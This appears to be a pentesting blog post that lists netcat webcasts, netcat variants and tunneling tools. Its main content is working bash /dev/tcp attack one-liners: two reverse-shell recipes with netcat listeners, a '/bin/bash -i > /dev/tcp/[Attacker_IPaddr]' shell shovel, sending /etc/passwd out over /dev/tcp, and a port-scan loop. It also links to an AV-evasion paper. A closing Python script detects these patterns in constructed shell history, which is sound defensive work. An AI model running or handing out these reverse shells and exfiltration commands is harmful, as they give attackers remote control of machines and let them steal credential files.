I was also asked what were some good webcasts that covered netcat & other pentesting tools & techniques, so there are links to a few of those below as well.
Enjoy!
Ed Skoudis - Crazy Ass Netcat Relays for Fun & Profit: http://pauldotcom.com/wiki/
Ed Skoudis - Penetration Testing Ninjitsu - http://na-d.marketo.com/lp/
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm parts 1-3 - http://na-d.marketo.com/lp/
Ed Skoudis / Josh Wright / Kevin Johnson - Penetration Testing Perfect Storm part 4 - http://na-d.marketo.com/lp/
Ed Skoudis & Kevin Johnson - Invasion of the Browser Snatchers, parts 1-3 - http://na-d.marketo.com/lp/
The 'Taking back Netcat' paper (dodging AV detection) - http://packetstormsecurity.
HowTo on tunneling over SSH - http://ha.ckers.org/ssh_proxy.
Netcat variants:
Ncat: http://nmap.org/ncat/
Socat: http://www.dest-unreach.org/
Cryptcat: http://cryptcat.sourceforge.
DNScat: http://tadek.pietraszek.org/
Also, here are some awesome tunneling & proxying tools:
PTunnel - http://www.cs.uit.no/~daniels/
Ptunnel is an application that allows you to reliably tunnel TCP connections to a remote host using ICMP echo request and reply packets, commonly known as ping requests and replies.
Stunnel - http://www.stunnel.org/
Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL.
Proxytunnel - http://proxytunnel.
Creates tunnels using HTTP and HTTPS proxies (those that understand the HTTP CONNECT command). Works as a back-end driver for an OpenSSH client, and creates SSH connections through HTTP(S) proxies.
The included paper is a REALLY good read as well - http://proxytunnel.
ProxyChains - http://proxychains.
This program allows you to use SSH, TELNET, VNC, FTP and any other Internet application from behind HTTP(HTTPS) and SOCKS(4/5) proxy servers.
BASH connect-back shell using /dev/tcp from http://www.
GnuCitizen User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis User Link
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0<>/dev/tcp/IP_Address/Port # First we open the connection as stdin (read/write)
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0<&0 1>&0 2>&0
Everything below is some more /dev/tcp "fu" from "Windows Command Line Ninjitsu" Episode 2 by Ed Skoudis:
Linux
• /dev/tcp rocks!
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port], which opens a connection to the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
• $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor
/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to attacker’s waiting Netcat listener, where commands can be entered
Linux Command-Line Port Scanner
• To see if a single port is open, we could run: $ echo > /dev/tcp/[IPaddr]/[port]
Storing Results and Iterating
• But, it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
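From the defender's side, as an added example (not code from the original post or from the webcast slides): a small Python scanner over constructed shell-history lines that flags /dev/tcp and /dev/udp redirections and labels each hit as a data transfer, a reverse shell, or a port-probe loop, the three uses described above. The sample lines and the 192.0.2.x addresses are constructed.

```python
import re
from typing import List

# A bash /dev/tcp or /dev/udp pseudo-path: protocol, host, port. The port may
# be a shell variable such as $port, as in the while-loop scanner above.
DEV_NET_RE = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-_$\[\]]+)/(\$?[A-Za-z0-9_\[\]]+)")
# A shell binary launched on the same command line (sh, bash, dash, /bin/sh ...).
SHELL_RE = re.compile(r"(?:^|[\s;|&])(?:/bin/|/usr/bin/)?(?:ba|da)?sh\b")

# Constructed sample shell-history lines (not real captured data);
# 192.0.2.0/24 is a documentation address range.
SAMPLE_HISTORY = """\
ls -la /var/log
cat /etc/passwd > /dev/tcp/192.0.2.10/4444
/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1
port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/192.0.2.20/$port; port=`expr $port + 1`; done
grep -r tcp /etc/services
"""


def classify(cmd: str) -> str:
    """Rough intent label for a command that references /dev/tcp or /dev/udp."""
    if SHELL_RE.search(cmd):
        return "reverse-shell"      # a shell with its fds pointed at the socket
    if "while" in cmd and "echo" in cmd:
        return "port-scan"          # echo-into-socket inside a loop
    return "transfer"               # file or data redirected into the socket


def find_dev_net_usage(lines: List[str]) -> List[dict]:
    """Return one record per /dev/tcp or /dev/udp reference found in `lines`."""
    hits = []
    for no, line in enumerate(lines, start=1):
        for proto, host, port in DEV_NET_RE.findall(line):
            hits.append({"line": no, "proto": proto, "host": host, "port": port,
                         "kind": classify(line), "cmd": line.strip()})
    return hits


if __name__ == "__main__":
    for hit in find_dev_net_usage(SAMPLE_HISTORY.splitlines()):
        print(f"line {hit['line']}: {hit['kind']:13} {hit['proto']} "
              f"{hit['host']}:{hit['port']}  {hit['cmd']}")
```

Because /dev/tcp is handled inside bash itself, no separate network binary is executed, so this pattern surfaces in command-line records (shell history, auditd logging of bash invocations, PROMPT_COMMAND-based logging) rather than in process-creation events for nc.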